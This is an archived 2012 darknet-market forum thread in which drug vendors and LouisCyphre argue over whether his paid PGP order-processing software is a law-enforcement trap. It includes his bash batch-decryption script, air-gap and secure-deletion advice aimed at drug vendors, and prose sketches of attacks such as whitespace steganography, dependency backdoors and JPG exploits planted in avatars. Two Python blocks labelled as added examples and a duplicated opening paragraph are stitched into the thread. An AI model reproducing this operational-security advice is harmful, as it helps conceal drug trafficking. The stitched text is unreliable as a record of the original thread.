People must understand that DPR isn't necessarily going to be pointing out every possible pitfall and removing them as options. For example, DPR's approach when I brought up the issue of LouisCyphre's program as a security concern for vendors was not "Yes, let's ban him, LE for sure" or "You're probably paranoid, Pine, I mean you think you're a platypus (but this is true)", it was "Go to the forum and have at it, let the vendors themselves decide what is best". This may seem strange, and it did to me at first blush, but I think the general idea, partly at least, is stemming from market based philosophy, is that being overly protective of a market could eventually lead to its downfall if people weren't recognizing 'issues' for themselves, whether or not they got them right or wrong.

Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: THUMBSuP. on September 06, 2012, 06:06 am
"Darknet Bootable USB" could easily have software or even hardware backdoor exploit. Every single purchaser of that could be LE for all you know. I wouldn't trust these for a single pictosecond. And what's the rest of your argument? You wouldn't trust a VM somebody anonymous sold you, but you'll trust some other anonymous dude selling you software? But wait! No! I must be wrong! Because some *other* totally anonymous dude says it's legit! It must be so! ZOMG!

Your operational security, I would not pay for it with somebody else's money.

I think you misunderstood me Pine, I meant that of course it would be even easier for these VM's to hide trojan's and wouldn't use them EVER.

Aha. Then we are agreed on that.

A general point I neglected to mention which may explain some of this situation:

People must understand that DPR isn't necessarily going to be pointing out every possible pitfall and removing them as options. For example, DPR's approach when I brought up the issue of LouisCyphre's program as a security concern for vendors was not "Yes, let's ban him, LE for sure" or "You're probably paranoid, Pine, I mean you think you're a platypus (but this is true)", it was "Go to the forum and have at it, let the vendors themselves decide what is best". This may seem strange, and it did to me at first blush, but I think the general idea, partly at least, is stemming from market based philosophy, is that being overly protective of a market could eventually lead to its downfall if people weren't recognizing 'issues' for themselves, whether or not they got them right or wrong.

what better way to find out if we want it or not than to let us "have at it".
i think this was a VERY GOOD thread. the accusations of Louis being LE could be highly ludicrous, but they needed to be brought to the table.

we, the people of the Road, need to talk about it.
if the program can't be offered how we need it to be offered as far as being secure as possible, then we don't need it.
and if a vendor can't handle 10 orders then they need to:
A. hire more people.
B. quit.
C. cut your business by 50%.
D. come in here and call everyone else a COP.

haha.
/thumbs
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: holyfuckisuck on September 06, 2012, 06:16 am
I agree that this is a bad way to make money for louis and that he should probably just release it open source with a tip jar.  I also don't know how many people would buy it either way or even if people would use such software if it was free so this whole thing strikes me as bizarre.  It just doesn't make sense to me really but everyone could use some extra cash I guess.  All in all I think louis just didn't think through how this might look to others.

Also, I know this is going to come out of left field but could you please stop with the platypus shit at least for this one thread.  I don't know where in the internet that started but I know like 3 teenage girls who for some reason think that just saying (actually mostly just typing) the word platypus is fucking hilarious and it brings back nightmarish scenes of pointless and retarded references more terrible to behold than a bad trip on 4 ozs of shrooms every time someone says the word platypus... OH THE HUMANITY!!

It's so fucking simple in the end:  Unless louis releases the code then we can't trust the program and there really isn't anything to it but that in my opinion.  So why the long ass posts etc?  I mean it's like all of you live in derpaderpistan or something.

Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: qrbr6 on September 06, 2012, 06:24 am
Good work looking out for the vendors pine, good contribution to the community. Anyone else who has the time to read around here should do their part too.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 06, 2012, 06:27 am
Quote
What are those serverside pieces of code that find their way into the client's main memory/HD? That's a bolt from the blue for pine. I thought something like that would be essentially illegal across the board because it could compromise the website itself if a hacker only needed to examine his RAM to extract data about the backend. I guess I took 'serverside' and 'clientside' as statements of fact rather than more general ideas with some caveats/exceptions attached. It's difficult to question literally everything you read or you never get anywhere.

the php code stays on the server but the html files it generates do not. the stylesheets the generated may not. The images on it do not. etc. If you don't have javascript disabled javascript can run on your machine as well. A lot of remote code execution bugs with firefox are linked to font rendering actually. There have been vulnerabilities in the firefox html engine as well, I am not certain but I believe they could be carried out with html only. Actually a little research has made me certain, here is an example of a firefox vulnerability that could be exploited with a specially crafted href http://www.cvedetails.com/cve/CVE-2007-2671/ . It doesn't mention the possibility of remote code execution, only a crash and denial of service, but where there is crashing remote code execution is generally possible. So you are correct that the php code for SR does not run in your memory, but things from SR are indeed present in your computer's memory and in some cases on its HD.


Quote
HTML can actually be exploited? Ok, now you're scaring me. I take it you mean that if a scripting language was allowed, then it could engineer something like a buffer overflow with the browser's HTML engine or something like that? Because if a bunch of <br> and <span> statements in any order, pattern or magnitude can be used to exploit then you can count me among the terrified. I've heard of images having exploits, but that it was rare, but not about GPG sigs or stuff like that.

Firefox's HTML engine can be exploited with HTML.  Here is a link about gpg being remotely exploited during signature verification although it is not the example I was thinking of it is the first thing I found about GPG exploits while searching for it http://forums.gentoo.org/viewtopic-p-6848828.html and here is another example of specially crafted signed / encrypted data being used to pwn people who process it through GPG: http://lwn.net/Articles/212909/
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 06, 2012, 06:30 am
just looked it up, seems Ubuntu does have apache compiled as position independent since version 9.04 so that is a big plus. Hopefully SR server has a 64 bit processor to take advantage of that.

Position independent..Is that the thing where programs get shoved around to random sections of memory?

Open source. Licenses. Rules. WTF? We sell fucking drugs here. There are hacked websites and programs and stolen shit galore!

I think what's going on here is that a lot of people who should know better, get gradually lulled into a false sense of security with the relative normality of using an Ebay like e-commerce site to buy illegal drugs. In the eyes of the law in most places, this makes you a criminal no matter how the contraband was obtained. It isn't different, it just seems even more stupid that transactions like these are illegal and this sometimes makes people relax for, perhaps thinking that because this feels more normal, legalization is around the corner. Perhaps that is so, but it is still so that the DEA want to throw you in prison right now regardless of what happens in the future!

--

Somebody mentioned here (but it disappeared)

Quote
When the auditors are happy that the code is not malicious, they could sign the archive with their PGP keys. The signature file would be distributed on a part of the site that the vendor doesn't control. Buyers could check the downloaded archive against the signature.

...That LouisCyphre could have obtained auditing, got the auditors to then sign the package as legitimate, and you'd be able to check if the package had changed in the same way you verify a PGP signature or SHA-1 hash when you download a program from the developers. Seems to me that's a reasonable question.

I mean it's not perfect as a solution, total open source is better still, but at least it would have begun to address vendor concerns about their operational security. That is why I have trouble believing LouisCyphre acted out of naivety, we have been talking to him about security and little else for months now, it's hard to believe this is something he'd overlook, something he wouldn't even address explicitly as an issue. Selling software to big drug dealers and not expecting that any checks might be necessary. You don't *need* to be paranoid to find that hugely weird. That's why I came to the conclusion I did. The shoe fits.
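The check pine describes above, and the substitution wretched raises earlier in the thread (one version audited, another sold), as an added example that is not part of the original thread or of any software discussed in it. It assumes a zip archive, SHA-256 in place of the SHA-1 mentioned above, a hypothetical manifest layout and constructed file names, and that the auditors' PGP signature over the manifest has already been verified separately with gpg.

```python
import hashlib
import io
import zipfile


def file_digests(archive_bytes):
    """Return ({member name: SHA-256 hex}, [names that occur more than once])."""
    digests, duplicates = {}, []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.filename in digests:
                # Two entries sharing a name: extractors can disagree on which
                # one wins, so the file that was audited may not be the one run.
                duplicates.append(info.filename)
                continue
            digests[info.filename] = hashlib.sha256(zf.read(info)).hexdigest()
    return digests, duplicates


def build_manifest(archive_bytes):
    """What the auditors publish (and sign): archive digest plus per-file digests."""
    files, duplicates = file_digests(archive_bytes)
    if duplicates:
        raise ValueError("refusing to sign an archive with duplicate member names")
    return {"archive_sha256": hashlib.sha256(archive_bytes).hexdigest(), "files": files}


def compare_to_manifest(archive_bytes, manifest):
    """Compare a downloaded archive against the audited manifest."""
    files, duplicates = file_digests(archive_bytes)
    audited = manifest["files"]
    return {
        # Byte-for-byte identity with the archive the auditors saw.
        "archive_match": hashlib.sha256(archive_bytes).hexdigest() == manifest["archive_sha256"],
        "modified": sorted(n for n in files if n in audited and files[n] != audited[n]),
        "added": sorted(n for n in files if n not in audited),
        "missing": sorted(n for n in audited if n not in files),
        "duplicates": sorted(set(duplicates)),
    }


def matches_audit(report):
    """True only if every file is one the auditors saw, with unchanged content."""
    return not (report["modified"] or report["added"]
                or report["missing"] or report["duplicates"])


def make_zip(files, stamp):
    """Build an in-memory zip with a fixed timestamp (constructed sample data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in files.items():
            zf.writestr(zipfile.ZipInfo(name, date_time=stamp), data)
    return buf.getvalue()


# Constructed samples: names and contents are hypothetical placeholders.
AUDITED_FILES = {
    "README.txt": b"order processing helper\n",
    "orders/decrypt.py": b"print('decrypt orders')\n",
}
SOLD_FILES = {
    "README.txt": b"order processing helper\n",
    "orders/decrypt.py": b"print('decrypt orders')\nimport support\n",
    "orders/support.py": b"# module the auditors never saw\n",
}
AUDITED = make_zip(AUDITED_FILES, (2012, 9, 5, 0, 0, 0))
# Same contents re-zipped a day later: archive bytes differ, files do not.
REPACKED = make_zip(AUDITED_FILES, (2012, 9, 6, 0, 0, 0))
SOLD = make_zip(SOLD_FILES, (2012, 9, 6, 0, 0, 0))
MANIFEST = build_manifest(AUDITED)

if __name__ == "__main__":
    for label, blob in (("audited", AUDITED), ("repacked", REPACKED), ("sold", SOLD)):
        report = compare_to_manifest(blob, MANIFEST)
        print(label, "OK" if matches_audit(report) else "MISMATCH", report)
```

A matching report only shows that the download is the code the auditors looked at; it says nothing about how good the audit was.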
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Shroomeister on September 06, 2012, 06:49 am
....all this and I think all its really about is Pine wanting a free copy......just ask sweetheart....just ask....
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: m1ndb3nder2501 on September 06, 2012, 07:13 am
....all this and I think all its really about is Pine wanting a free copy......just ask sweetheart....just ask....

lol^^ my guess by their posts is that they wouldn't run it on their system if they did but wouldn't it be funny if they did and it turned out to be everything that was promised? i think it's kind of been forgotten that Louis created this out of request by another vendor... why doesn't someone just ask the vendor if it works? if they're reputable then it really shouldn't be that hard to trust their answer. LE can't just traffic mass quantities of drugs through the mail using an ordering system via darknet, as much as paranoid people would like to believe this. what kind of police work would that be? sure they could set up a fake vendor account and use a shitload of other fake buyer accounts to create feedback, but don't you think people would catch on if they canceled every REAL order? just saying... nobody except for Louis seems to have done a really good job of explaining much of anything about this software on this thread so at this point, i'm inclined to believe him more than take anyone else's opinion on it. wouldn't run the software without hearing from the vendor who requested it and used it though.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: THUMBSuP. on September 06, 2012, 07:21 am
Louis is a smart smart smart smart entity.(from what i can tell.)
i really just don't think he could be LE.. but wouldn't the best fit in the painting without being noticed? (where's waldo effect.)


well played, DEA, well played.
haha..


sorry. i love everyone. no offense aimed at anyone.
no harm no foul.

/thumbs
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 06, 2012, 07:38 am
....all this and I think all its really about is Pine wanting a free copy......just ask sweetheart....just ask....

lol^^ my guess by their posts is that they wouldn't run it on their system if they did but wouldn't it be funny if they did and it turned out to be everything that was promised? i think it's kind of been forgotten that Louis created this out of request by another vendor... why doesn't someone just ask the vendor if it works? if they're reputable then it really shouldn't be that hard to trust their answer. LE can't just traffic mass quantities of drugs through the mail using an ordering system via darknet, as much as paranoid people would like to believe this. what kind of police work would that be? sure they could set up a fake vendor account and use a shitload of other fake buyer accounts to create feedback, but don't you think people would catch on if they canceled every REAL order? just saying... nobody except for Louis seems to have done a really good job of explaining much of anything about this software on this thread so at this point, i'm inclined to believe him more than take anyone else's opinion on it. wouldn't run the software without hearing from the vendor who requested it and used it though.

Do you have ADD and are incapable of following the discussion here? I find all of these diversion type comments to be pretty sketchy. None of this thread has anything to do with LE vendors shipping drugs, although it is extremely naive to think that law enforcement can not sell drugs that end up being used by people. If this were the case there would be no such thing as an undercover investigation, the organization being infiltrated could merely require that the agent be observed dealing drugs to users and then monitor if any of them are busted or not. If LE could not sell drugs that are then used, they could not do undercover operations. But all of that is completely irrelevant to the topic at hand here. You clearly are incapable of understanding the sort of attack we are talking about or really anything that is going on in this thread.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 07:57 am
Think what you will, but you can always use his software on a machine that's not connected to the net.

Of course. All vendors use physical Air Gaps by burning information from the Internet on read only CD/DVDs, decrypt on the isolated machine, and then in order to communicate back across the Air Gap they use either the keyboard to transfer information across to the networked machine using their eyeballs, or else they utilize something like a checksum to ensure the information coming back on a read only CD/DVD is precisely what was intended to come back across. This will mean manually adding up and knowing the exact data.

Because that's pretty much the only way what you said would work, could work. Otherwise it just doesn't. So what you said is essentially for practical purposes complete bullshit.

Given all the software does, you can do that.

Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible. Cannot be licensed under GPL otherwise.

Yes. Because it's totally irrelevant so long as the code is not explicitly posted whereby it can be audited. For several reasons, four of which are:

A: What you get today, may not be what you get tomorrow. A bait and switch is as simple as it gets with exploits.

Easily proven wrong with SHA256 checksums.  Actually, there's a point, better go and add that for the individual files.

B: The exploit may not be in the actual software, ever. The malware could be in the related pieces of software you need to acquire to make it 'work'. e.g. HTMLDOCs. This was an exploit achieved by the Vietnamese Secret Service against Tor users a few years ago. People downloaded Tor and it was fine. But they needed to download a language set for Vietnamese for the Windows operating system. Turned out the backdoor was in that language set they downloaded, and everybody who was reading Vietnamese on Windows had become part of the Vietnamese Secret Service's botnet.

That's also how Anonymous got the kiddie fiddlers, by getting them to use an infected version of Tor Button.

As for HTMLDOC, you can examine its code.  Alternatively you can skip it and just opt for printing plain text or even the HTML.  I only included the HTML to PDF function because the vendor who originally contacted me wanted to print to envelopes and HTMLDOC allowed easy generation of a PDF which matched the layout of the template the vendor provided to me.

C: The vast majority of vendors will not be computer programmers and will have to rely on trust in somebody else's judgement. This is very bad. If you have a flock of apparent experts telling you it's legitimate, you let down your guard and then you get fucked.

The code isn't that complex, I can step them through the essentials of what it does and then they can ask someone not connected to all of this whether I'm full of shit or not.

D: There are extremely clever ways of putting exploits into code, even when it's capable of being monitored, it can be hard to tell. It's not like reading a book, even experienced programmers could be caught out if they are not trained to analyze potentially malicious code. Code analysis for finding memory leaks and other bugs is one thing, hunting down a backdoor is something else completely.

Don't expect an exploit to be straightforward. They are deliberately engineered to obfuscate the origin of the exploit. That is kind of the entire point of an exploit.

Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.

Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: THUMBSuP. on September 06, 2012, 08:08 am
....all this and I think all it's really about is Pine wanting a free copy......just ask sweetheart....just ask....

lol^^ my guess by their posts is that they wouldn't run it on their system if they did but wouldn't it be funny if they did and it turned out to be everything that was promised? i think it's kind of been forgotten that Louis created this out of request by another vendor... why doesn't someone just ask the vendor if it works? if they're reputable then it really shouldn't be that hard to trust their answer. LE can't just traffic mass quantities of drugs through the mail using an ordering system via darknet, as much as paranoid people would like to believe this. what kind of police work would that be? sure they could set up a fake vendor account and use a shitload of other fake buyer accounts to create feedback, but don't you think people would catch on if they canceled every REAL order? just saying... nobody except for Louis seems to have done a really good job of explaining much of anything about this software on this thread so at this point, i'm inclined to believe him more than take anyone else's opinion on it. wouldn't run the software without hearing from the vendor who requested it and used it though.

Do you have ADD and are incapable of following the discussion here? I find all of these diversion type comments to be pretty sketchy. None of this thread has anything to do with LE vendors shipping drugs, although it is extremely naive to think that law enforcement can not sell drugs that end up being used by people. If this were the case there would be no such thing as an undercover investigation, the organization being infiltrated could merely require that the agent be observed dealing drugs to users and then monitor if any of them are busted or not. If LE could not sell drugs that are then used, they could not do undercover operations. But all of that is completely irrelevant to the topic at hand here. You clearly are incapable of understanding the sort of attack we are talking about or really anything that is going on in this thread.
+1
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Longtimer on September 06, 2012, 08:16 am
Awesome! I'm no vendor but I want to buy this software and have a looksy inside its guts!
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 09:39 am
*If* it were open source,

It is.

This is a technicality, you know exactly what I mean by it, it's not 'open' if it's not visible for auditing *before* anybody uses it.

Ah, so your definition is free as in speech and beer.  Alright.

I'll tell you what, I'll speak to DPR about independently vetting it offline.  Would that be good enough?

Louis, if DPR himself came down from the clouds in a blaze of heavenly glory on a magnificent green camel and said the code was legitimate but that we couldn't independently audit it, it still wouldn't count for much.

Okay.

This is because DPR's account could be compromised. Not to mention because even if DPR was posting (lest we forget Sabu) to say it was legitimate, it still doesn't prove anything. This is because we would be trusting in somebody. We assume everybody here is a potential LE agent or could become one, that is why this system works. I know you know this, I'm just making a mini-tutorial on how darknet markets are supposed to operate for any others watching this thread who don't know.

Fine.

*if* we could be sure the code wouldn't upload as X to the first few downloaders and Y or Z to the next people who download it, then yeah, offering software services on SR of this nature might just work.

I reckon it can, that's why I'm bothering to do this.

Oh really? Tell me, how precisely is that supposed to work?

Well, not needing any kind of network connectivity is a good start.  Seriously, all it does is turn order data from a HTML page into something that prints.

If you can show me how a computer connected only to a printer can mysteriously beam data to the agency of your choice, then I'll buy it.

Of course, it's still strange to make *sales* of software for *vendors* for economic reasons. I mean there is no market even if every vendor bought the software.

The market is certainly a niche one.  Especially when it may not be worth it for smaller volume vendors.

I may come up with something for buyers later, but my focus is just this for now.

Uh huh. I bet.

Ah, fuck it, here's messages.sh which is a very slight variation on the original proof-of-concept shell script which led to me redesigning it in Bash and Python.  To use it go to a page with multiple encrypted messages on it (most of your PMs, for example), Control+a, Control+c, open a text file called allmessages.txt, Control+v, save and run the script in the same location.

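Code:
#!/bin/bash

# Copyright (C) Louis Cyphre, 2012

# Split the pasted page into one chunk per message.
# Note: -p (split on a pattern) is a BSD/macOS split option; GNU split lacks it.
split -p "-----BEGIN PGP MESSAGE-----" allmessages.txt message

echo "-----BEGIN PGP MESSAGE-----" > pgpmsgbegin.text

# sed's c command replaces line 1 of each chunk (globs avoid parsing ls output).
for x in message* ; do
sed '1 c\' "$x" > "$x.txt"
done

# Put the armor header line on top of each file.
for x in *.txt ; do
cat pgpmsgbegin.text "$x" > "$x.asc"
done

# Decrypt files

gpg --decrypt-files *.asc

# Universal file deletion (replace with preferred system specific method).
# rm is used here because mv of several files to /dev/null fails:
# rm -f message*.txt

# Apple Secure delete:
# srm -fmz message*.txt

# Linux Secure delete (install srm first):
# srm -fD message*.txt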

The Python handles writing the *.asc files in a nicer way (better naming for if one needs to be edited before printing, for example) as well as rewriting decrypted data to HTML prior to printing.

possibly with an anonymous bitcoin 'tip jar' available.

The return on that would be insignificant

Whether or not that is true, it is contradictory to claim you want more money, and then target a market so insignificant.

I disagree, it depends on the focus.  I'm not expecting that this will make me rich, but a few sales would be nice.

The main issue is that you wanted the big vendors to acquire your software and run it, and that this software was not capable of being audited on this forum, and that even if it was visible, there is still the questions of whether some sneaky side channel attack wouldn't be made since the software relies on downloading new unknown pieces of software, which could easily contain exploits delivered exclusively on those dependencies downloaded through the Tor network.

It has 3 dependencies:

* Python
* GPG
* HTMLDOC (which can be skipped if you don't mind printing plain text or want to use your own method of preparing documents for printing).

I find it difficult to believe the official Python implementation could be backdoored without anyone noticing.

As for GPG, well, if you don't trust that then you're not the platypus I took you for.

Or that you wouldn't simply perform a bait and switch with the software. A single line of code could compromise a vendor's IP address, and it wouldn't have to look obvious like a direct network call either.

It would still require access to a network.

Indeed, the exploit doesn't necessarily even need to communicate the IP over the network without the aid of the vendor. The software could cleverly adjust the whitespace count of a PGP plaintext message so that it contained IP address information. Then the LE buyer could extract the IP address directly from the decrypted message. Very simple, very effective, almost impossible to catch on the fly. You wouldn't even need to target the encryption software this way.

I think you're misunderstanding what it does with encrypted data.  It's simply writing encrypted messages to multiple files and then calling GPG to decrypt them all simultaneously.

Also, the instructions in the README.txt file include this:

1) Open a terminal and make a temporary directory on an encrypted
   volume.
2) Switch to the temporary directory and copy *.sh and *.py to the
   temporary directory.  Make sure the files are executable:
     chmod +x *.py
     chmod +x *.sh
...
18) Change directory up one level and securely delete the entire
    temporary directory created in the first step using your preferred
    file wiping program (e.g. srm or shred).

Oh dear, the copy of the code that is executed gets wiped along with
all of the generated files when you're done.  Gosh, how will it manage
to smuggle secret information back to LEOs inserted up the back end of
a ferret now.

To avoid sneaky tricks, the rule is simple and highly efficient. Don't trust software from anonymous sources with extreme prejudice with the exception of the specific situation kmfkewm has mentioned. And even then you have to watch it. The forum could be populated by 1001 people and 1000 of them could be sock puppets. LE have used such software on carding forums and the like with great effect before now.

Then don't buy it.  I'm not forcing anyone to, it's their choice.

I know that the code will pass any audit, that it does not connect to any other systems from where it is run and does not re-implement OpenPGP (it calls GPG to decrypt multiple files simultaneously using the --decrypt-files flag I mentioned in Peach's thread).

As I mentioned briefly above, there is a multitude of non-obvious ways of compromising a system because you're using somebody else's code. Any software dependencies could themselves contain an exploit, and it can be a multi-stage process. It could be the whitespace insertion/removal plaintext encoding trick, replacement of characters with esoteric unicode char synonyms, there's an entire universe of possibilities. Just because pine might not see if pine examines the code personally doesn't mean much either. Exploits are like a magician's magic trick. It's the one thing you don't think of, that makes it seem like an impossibility.

There are far better vectors for attack on this site than a handful of scripts that can be read before they're run or run on a disconnected system.

Seriously, if I wanted to do that I'd be planting malicious code in a compressed file that was automatically loaded, like a JPG for example.  Put it in an avatar and then make a post attacking a particular vendor to lure that vendor into an argument and force them to load it.

There's more than one way to distribute open source software and it does not require giving it away.

I never disputed that. This is just a way to sidetrack the discussion.

No, I was just under the mistaken impression that you were using the OSI definition of open source.

There is a BIG difference between what is acceptable on a civilian forum, and on a forum of international drug smugglers.

Yes, there is, but I'm not forcing anyone to buy or use this.  I am providing a product which some vendors may elect to purchase and use and others may choose not to.  It's a free market.

Currently the Python code uses the csv module and basic Python functions, mainly involving lists, reading files and writing new files.

I have already described at least 3 different attacks in this one post alone that you cannot possibly address in your description of what you say is happening because the code is not capable of being properly audited. Any programs from anonymous sources need to be visible on the forum period.

One of which requires network access, which is not required by the program.  One involves a false assumption about the use of cryptography in the script (it calls GPG *once* with a decryption command).  The last requires planting a backdoor in any of the following: Python (probably already on your system, if it's compromised you're already fucked), Bash (same as Python), GPG (extensively audited already) or HTMLDOC (if you're worried, skip that part).

And again, for emphasis, it doesn't matter if pine cannot figure out where the exploit is hiding. The fact remains that you've made an incredibly incriminating move on these forums. One that would have been blatantly obvious to any IT security professional, and since you have such expertise, you cannot then go and claim ignorance.

For fuck's sake!  I can think of sneakier and nasty ways to target this site, if I was really trying to do it then I sure as shit wouldn't have tried this.  See my JPG example above (and do a Google search on "jpg exploit").

The LE accusation only holds true if the code can somehow report on users, which it doesn't. 

We really have no way to know that without the code being placed on this forum. Your attitude is from the get-go that we should take your word for it.

And your attitude from the get-go has been completely paranoid, accusatory and frankly offensive.  I'm also now convinced that even if and/or when the code is posted to the forums (which frankly I wouldn't trust for a real security audit, with one or two very rare exceptions) that you'd still come up with some reason to stick to your attack.

It can quite easily run on a completely disconnected system.  It makes no difference to the program.

Like I said to Sands, this is basically impossible because it's impractical for vendors without appropriate utilization of an Air Gap.

Then they should employ one.  Seriously, some old cheap PC with no USB and all the ethernet ports ripped out running a bare minimum install.  Data transferred to it via read-only media and no data EVER transferred off it and it's done.  How much would it cost using hardware from 6 or 7 years ago?  Fifty bucks?  A hundred?

Pine, this is the second time you've accused me of being LE based on a misunderstanding of software.  The first time was not understanding how GPG verifies signatures.  You were able to verify that my explanation matched GPG's documentation independently and I have no doubt that in time the independent verification will prove me right here.

I did not accuse you of being a LE agent before. I merely stated I had to validate your claims that GPG worked the way you said it did. That was possible in that instance.

Actually you did:

Quote from: pine
bash-3.2$ ls -l pine-leo1.eml.asc
-rw-r--r--  1 user  staff  1951 Sep  6 07:37 pine-leo1.eml.asc
bash-3.2$ gpg -v pine-leo1.eml.asc
gpg: armor header: Version: GnuPG v2.0.17 (MingW32)
gpg: public key is 0x00ACF6D2D677EF45
gpg: using subkey 0x00ACF6D2D677EF45 instead of primary key 0x7E8BE6B1DD7B4576

You need a passphrase to unlock the secret key for
user: "Louis Cyphre <lcyphre@tormail.org>"
gpg: using subkey 0x00ACF6D2D677EF45 instead of primary key 0x7E8BE6B1DD7B4576
4096-bit ELG-E key, ID 0x00ACF6D2D677EF45, created 2012-06-16
         (subkey on main key ID 0x7E8BE6B1DD7B4576)

gpg: encrypted with 4096-bit ELG-E key, ID 0x00ACF6D2D677EF45, created 2012-06-16
      "Louis Cyphre <lcyphre@tormail.org>"
gpg: AES256 encrypted data
gpg: original file name=''
bash-3.2$ cat pine-leo1.eml
Hi LC!

Your signed PGP message is invalid! :O

I've tested it with other people's PGP sigs, and the software is working ok.

KeyID: DD7B4576
Status: Key NOT valid
User Name: Louis Cyphre <lcyphre@tormail.org>

So, either signed it wrong or you're LE attempting a threesome :D

Cheers!

Pine
bash-3.2$

So, I re-iterate, this is your second false accusation against me.  Unless you're going to deny that you sent me that and to which I responded by explaining how key validity and the web of trust works.

In this instance, it is impossible for me, or anybody else, to validate your claims about this software. That is the single most important fact, and no amount of Cyphre Software Apologists are going to make that go away.

Yet there are ways for anyone who buys it to do so.  Not to mention the fact that if it were to fail such an audit they could get my account suspended by SR.

Gladly.  Got any other questions I haven't addressed already?

^  Try explaining how 3 different attacks can be addressed using available evidence without us auditing the software on this forum.

A: Simple Bait 'n Switch.
B: Whitespace/character adjustment/replacement to communicate invisible data via the vendors themselves.
C: Software dependency backdoors.

Already done, see above.

And explaining those away still doesn't achieve the main objective you should have had from the onset. There is basically no way to "decriminate" yourself in fact.

Which proves the point I made above, you've made up your mind and there's nothing I can do to change that.  As I said, even if I were to post all the code now you'd still think I was up to something.

This is not a court of law, we don't have innocent until proven guilty here. Again, not relying on human trust is the lynchpin of the darknet markets. Everybody is potentially an LE agent, some more so than others, since they intend to upload non-audited software anonymously to big drug dealers online and expect nobody will have a qualm about how sketchy that looks.

If people think I've done something dodgy they don't have to buy it and if they do buy it they don't have to either keep it secret or use it in a way that could reconnect to either the Tor network or the clearnet.  It's entirely up to them.
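
Pine's attack B above (whitespace counts and substituted characters carrying hidden data inside an otherwise normal message) can be checked on the text itself, whatever program produced it. This is an added example, not part of any post and not LouisCyphre's code: `audit_text` and `canonicalize` are hypothetical helper names, and the sample label is constructed.

```python
import re
import unicodedata

# Constructed sample: the same label, clean and with hidden carriers added.
CLEAN = "Order 1234\nJane Doe\n1 Example Street\nSpringfield\n"
TAMPERED = "Order 1234 \nJane\u200b Doe\n1  Example Street\t\nSpringfield\u00a0\r\n"


def _describe(ch):
    return f"U+{ord(ch):04X} {unicodedata.name(ch, 'UNNAMED')}"


def audit_text(text):
    """Return (line_number, kind, detail) for each place data could hide."""
    findings = []
    for lineno, raw in enumerate(text.split("\n"), 1):
        if raw.endswith("\r"):
            findings.append((lineno, "carriage-return", "CRLF line ending"))
            raw = raw[:-1]
        body = raw.rstrip(" \t")
        if body != raw:
            findings.append((lineno, "trailing-whitespace", repr(raw[len(body):])))
        if body[:1] in (" ", "\t"):
            findings.append((lineno, "leading-whitespace", "line is indented"))
        if re.search(r"\S {2,}\S", body):
            findings.append((lineno, "space-run", "two or more spaces between words"))
        for ch in body:
            cat = unicodedata.category(ch)
            if cat == "Cc":
                kind = "control"            # includes tabs inside the line
            elif ord(ch) < 128:
                continue                    # ordinary printable ASCII
            elif cat == "Cf":
                kind = "invisible"          # zero-width and other format characters
            elif cat == "Zs":
                kind = "unusual-space"      # any space other than U+0020
            elif unicodedata.normalize("NFKC", ch) != ch:
                kind = "compat-lookalike"   # e.g. fullwidth letters
            else:
                kind = "non-ascii"          # may be legitimate; needs a human look
            findings.append((lineno, kind, _describe(ch)))
    return findings


def canonicalize(text):
    """Rewrite text so whitespace and invisible characters carry no information."""
    text = unicodedata.normalize("NFKC", text)
    kept = []
    for ch in text:
        cat = unicodedata.category(ch)
        if cat == "Cf" or (cat == "Cc" and ch not in "\n\t"):
            continue                        # drop invisible and control characters
        kept.append(" " if cat == "Zs" or ch == "\t" else ch)
    lines = [re.sub(r" {2,}", " ", ln).strip(" ") for ln in "".join(kept).split("\n")]
    return "\n".join(lines).strip("\n") + "\n"


if __name__ == "__main__":
    for finding in audit_text(TAMPERED):
        print(finding)
    print(canonicalize(TAMPERED) == CLEAN)
```

Canonicalizing text before it leaves the machine removes these carriers even when nobody reads the findings; it does nothing about data hidden in word choice or ordering.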
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 09:50 am
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible. Cannot be licensed under GPL otherwise.

Exactly!  Also, I figured that using any other license wouldn't matter if others who receive the code release it anyway, so I selected a license that guarantees other changes be able to be released.

I didn't choose the GPL Affero v3 because that would require publicly releasing every version, including customised ones for specific clients.  For example, the version currently available is version 1.1, but version 1.0 doesn't have the code for handling plain text orders only because the vendor who initially contacted me cancels unencrypted orders.

Obviously the GPLv3 does not prevent selling code released under that license.  Without going into specifics, I've discussed this with RMS face-to-face, but all this can be confirmed from the Free Software Foundation.

The GPLv3 simply grants certain rights to users and the obligation that the source be made available with the distribution.  Since the distribution *is* the source code (Python executables are great like that), then that obligation is covered.

What a complete red herring this is. It wouldn't matter if Linus Torvalds and Bill Gates both signed off on the deal :D

Not really, I was under the mistaken assumption that you were using the commonly accepted definition of open source and/or free software.  Instead of your own.

I'm not going to apologise for that.

I admit I didn't notice what particular "license" was being used. And it doesn't matter one fucking jot because source doesn't need be closed in order to contain or be connected to some exploit. It just needs not enough people to be observant enough to catch it in time. That's all it requires. Surely people don't expect that LouisCyphre expected us to be having this discussion...? In his view, a bunch of vendors should have just run his half a dozen or so files without a single quibble.

Actually I didn't, but part of the reason for including vendor support in the price is because I expected to have to show them how to use it securely.

is it even possible to make python programs closed source? What is it, bytecode?

